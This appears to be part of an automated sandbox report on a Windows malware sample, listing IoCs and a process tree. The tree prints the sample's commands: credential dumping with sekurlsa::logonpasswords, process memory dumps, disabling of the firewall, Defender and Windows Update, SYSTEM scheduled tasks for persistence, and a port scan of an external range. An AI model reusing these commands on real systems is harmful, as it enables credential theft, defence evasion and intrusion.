\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" qfabize.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" qfabize.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" qfabize.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" yzzreckrz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump yzzreckrz.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" qfabize.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ qfabize.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" qfabize.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3596 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2952 schtasks.exe 4088 schtasks.exe 3768 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 5076 92c1974ed4c1b8186bb4845ced9de1f0N.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 5076 92c1974ed4c1b8186bb4845ced9de1f0N.exe Token: SeDebugPrivilege 3128 qfabize.exe Token: SeDebugPrivilege 2040 qfabize.exe Token: SeDebugPrivilege 4008 vfshost.exe Token: SeDebugPrivilege 3512 yzzreckrz.exe Token: SeLockMemoryPrivilege 3732 kfcalc.exe Token: SeLockMemoryPrivilege 3732 kfcalc.exe Token: SeDebugPrivilege 3432 yzzreckrz.exe Token: SeDebugPrivilege 1992 yzzreckrz.exe Token: SeDebugPrivilege 4812 yzzreckrz.exe Token: SeDebugPrivilege 4468 yzzreckrz.exe Token: SeDebugPrivilege 3044 yzzreckrz.exe Token: SeDebugPrivilege 1136 yzzreckrz.exe Token: SeDebugPrivilege 1660 yzzreckrz.exe Token: SeDebugPrivilege 1916 yzzreckrz.exe Token: SeDebugPrivilege 1000 yzzreckrz.exe Token: SeDebugPrivilege 3704 yzzreckrz.exe Token: SeDebugPrivilege 372 yzzreckrz.exe Token: SeDebugPrivilege 4648 yzzreckrz.exe Token: SeDebugPrivilege 4100 yzzreckrz.exe Token: SeDebugPrivilege 4844 yzzreckrz.exe Token: SeDebugPrivilege 3300 yzzreckrz.exe Token: SeDebugPrivilege 3972 yzzreckrz.exe Token: SeDebugPrivilege 2796 yzzreckrz.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 5076 92c1974ed4c1b8186bb4845ced9de1f0N.exe 5076 92c1974ed4c1b8186bb4845ced9de1f0N.exe 3128 qfabize.exe 3128 qfabize.exe 2040 qfabize.exe 2040 qfabize.exe 380 xohudmc.exe 2724 nslfoo.exe 4892 qfabize.exe 4892 qfabize.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5076 wrote to memory of 5064 5076 92c1974ed4c1b8186bb4845ced9de1f0N.exe 84 PID 5076 wrote to memory of 5064 5076 92c1974ed4c1b8186bb4845ced9de1f0N.exe 84 PID 5076 wrote to memory of 5064 5076 92c1974ed4c1b8186bb4845ced9de1f0N.exe 84 PID 5064 wrote to memory of 3596 5064 cmd.exe 86 PID 5064 wrote to memory of 3596 5064 cmd.exe 86 PID 5064 wrote to memory of 3596 5064 cmd.exe 86 PID 5064 wrote to memory of 3128 5064 cmd.exe 93 PID 5064 wrote to memory of 3128 5064 cmd.exe 93 PID 5064 wrote to memory of 3128 5064 cmd.exe 93 PID 2040 wrote to memory of 4176 2040 qfabize.exe 95 PID 2040 wrote to memory of 4176 2040 qfabize.exe 95 PID 2040 wrote to memory of 4176 2040 qfabize.exe 95 PID 4176 wrote to memory of 1332 4176 cmd.exe 97 PID 4176 wrote to memory of 1332 4176 cmd.exe 97 PID 4176 wrote to memory of 1332 4176 cmd.exe 97 PID 4176 wrote to memory of 3992 4176 cmd.exe 98 PID 4176 wrote to memory of 3992 4176 cmd.exe 98 PID 4176 wrote to memory of 3992 4176 cmd.exe 98 PID 4176 wrote to memory of 1732 4176 cmd.exe 99 PID 4176 wrote to memory of 1732 4176 cmd.exe 99 PID 4176 wrote to memory of 1732 4176 cmd.exe 99 PID 4176 wrote to memory of 3512 4176 cmd.exe 100 PID 4176 wrote to memory of 3512 4176 cmd.exe 100 PID 4176 wrote to memory of 3512 4176 cmd.exe 100 PID 4176 wrote to memory of 2244 4176 cmd.exe 101 PID 4176 wrote to memory of 2244 4176 cmd.exe 101 PID 4176 wrote to memory of 2244 4176 cmd.exe 101 PID 4176 wrote to memory of 4616 4176 cmd.exe 102 PID 4176 wrote to memory of 4616 4176 cmd.exe 102 PID 4176 wrote to memory of 4616 4176 cmd.exe 102 PID 2040 wrote to memory of 2488 2040 qfabize.exe 103 PID 2040 wrote to memory of 2488 2040 qfabize.exe 103 PID 2040 wrote to memory of 2488 2040 qfabize.exe 103 PID 2040 wrote to memory of 856 2040 qfabize.exe 106 PID 2040 wrote to memory of 856 2040 qfabize.exe 106 PID 2040 wrote to memory of 856 2040 qfabize.exe 106 PID 2040 wrote to memory of 2624 2040 qfabize.exe 108 PID 2040 wrote to memory of 2624 2040 qfabize.exe 108 PID 2040 wrote to memory of 2624 2040 qfabize.exe 108 PID 2040 wrote to memory of 3220 2040 qfabize.exe 112 PID 2040 wrote to memory of 3220 2040 qfabize.exe 112 PID 2040 wrote to memory of 3220 2040 qfabize.exe 112 PID 3220 wrote to memory of 988 3220 cmd.exe 114 PID 3220 wrote to memory of 988 3220 cmd.exe 114 PID 3220 wrote to memory of 988 3220 cmd.exe 114 PID 988 wrote to memory of 1844 988 wpcap.exe 115 PID 988 wrote to memory of 1844 988 wpcap.exe 115 PID 988 wrote to memory of 1844 988 wpcap.exe 115 PID 1844 wrote to memory of 4220 1844 net.exe 117 PID 1844 wrote to memory of 4220 1844 net.exe 117 PID 1844 wrote to memory of 4220 1844 net.exe 117 PID 988 wrote to memory of 4340 988 wpcap.exe 118 PID 988 wrote to memory of 4340 988 wpcap.exe 118 PID 988 wrote to memory of 4340 988 wpcap.exe 118 PID 4340 wrote to memory of 5024 4340 net.exe 120 PID 4340 wrote to memory of 5024 4340 net.exe 120 PID 4340 wrote to memory of 5024 4340 net.exe 120 PID 988 wrote to memory of 4888 988 wpcap.exe 121 PID 988 wrote to memory of 4888 988 wpcap.exe 121 PID 988 wrote to memory of 4888 988 wpcap.exe 121 PID 4888 wrote to memory of 2204 4888 net.exe 123 PID 4888 wrote to memory of 2204 4888 net.exe 123 PID 4888 wrote to memory of 2204 4888 net.exe 123 PID 988 wrote to memory of 3832 988 wpcap.exe 124
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2128
-
C:\Windows\TEMP\kceeicrzi\kfcalc.exe"C:\Windows\TEMP\kceeicrzi\kfcalc.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\92c1974ed4c1b8186bb4845ced9de1f0N.exe"C:\Users\Admin\AppData\Local\Temp\92c1974ed4c1b8186bb4845ced9de1f0N.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\mzqrhbdf\qfabize.exe2⤵
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:3596
-
-
C:\Windows\mzqrhbdf\qfabize.exeC:\Windows\mzqrhbdf\qfabize.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3128
-
-
-
C:\Windows\mzqrhbdf\qfabize.exeC:\Windows\mzqrhbdf\qfabize.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:4176 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1332
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:3992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1732
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3512
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2244
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:4616
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2488
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:856
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2624
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\crwkenged\qecbgmeqc\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Windows\crwkenged\qecbgmeqc\wpcap.exeC:\Windows\crwkenged\qecbgmeqc\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:988 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:1844 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4220
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4340 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:5024
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2204
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:3832
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4632
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2252
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4492
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4668
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:536
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2096
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1848
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\crwkenged\qecbgmeqc\wrncrrpzd.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\crwkenged\qecbgmeqc\Scant.txt2⤵PID:4476
-
C:\Windows\crwkenged\qecbgmeqc\wrncrrpzd.exeC:\Windows\crwkenged\qecbgmeqc\wrncrrpzd.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\crwkenged\qecbgmeqc\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3356
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\crwkenged\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\crwkenged\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:1640 -
C:\Windows\crwkenged\Corporate\vfshost.exeC:\Windows\crwkenged\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "eeqmizcch" /ru system /tr "cmd /c C:\Windows\ime\qfabize.exe"2⤵PID:2588
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "eeqmizcch" /ru system /tr "cmd /c C:\Windows\ime\qfabize.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:3768
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "fmfzmibee" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mzqrhbdf\qfabize.exe /p everyone:F"2⤵PID:3824
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1308
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "fmfzmibee" /ru system /tr "cmd /c echo Y|cacls C:\Windows\mzqrhbdf\qfabize.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qfcbctqmh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kceeicrzi\kfcalc.exe /p everyone:F"2⤵PID:2688
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qfcbctqmh" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kceeicrzi\kfcalc.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4088
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4576
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3504
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5024
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5116
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4108
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4884
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4144
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4624
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4376
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1480
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3816
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:676
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 788 C:\Windows\TEMP\crwkenged\788.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3512
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4048
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1704
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:384
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1424
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1344
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4576
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:1068
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:5084
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:2016
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:4736
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2320
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:2688
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:3716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2032
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:2588
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:4220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:3652
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:2204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2296
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:2068
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:4844
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:380
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 64 C:\Windows\TEMP\crwkenged\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3432
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 2128 C:\Windows\TEMP\crwkenged\2128.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1992
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 2632 C:\Windows\TEMP\crwkenged\2632.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 2780 C:\Windows\TEMP\crwkenged\2780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 2800 C:\Windows\TEMP\crwkenged\2800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 2912 C:\Windows\TEMP\crwkenged\2912.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1136
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 3800 C:\Windows\TEMP\crwkenged\3800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 3888 C:\Windows\TEMP\crwkenged\3888.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1916
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 3956 C:\Windows\TEMP\crwkenged\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1000
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 4040 C:\Windows\TEMP\crwkenged\4040.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3704
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 4508 C:\Windows\TEMP\crwkenged\4508.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:372
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 2360 C:\Windows\TEMP\crwkenged\2360.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4648
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 3124 C:\Windows\TEMP\crwkenged\3124.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4100
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 1400 C:\Windows\TEMP\crwkenged\1400.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 4004 C:\Windows\TEMP\crwkenged\4004.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3300
-
-
C:\Windows\TEMP\crwkenged\yzzreckrz.exeC:\Windows\TEMP\crwkenged\yzzreckrz.exe -accepteula -mp 2748 C:\Windows\TEMP\crwkenged\2748.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3972
-
-
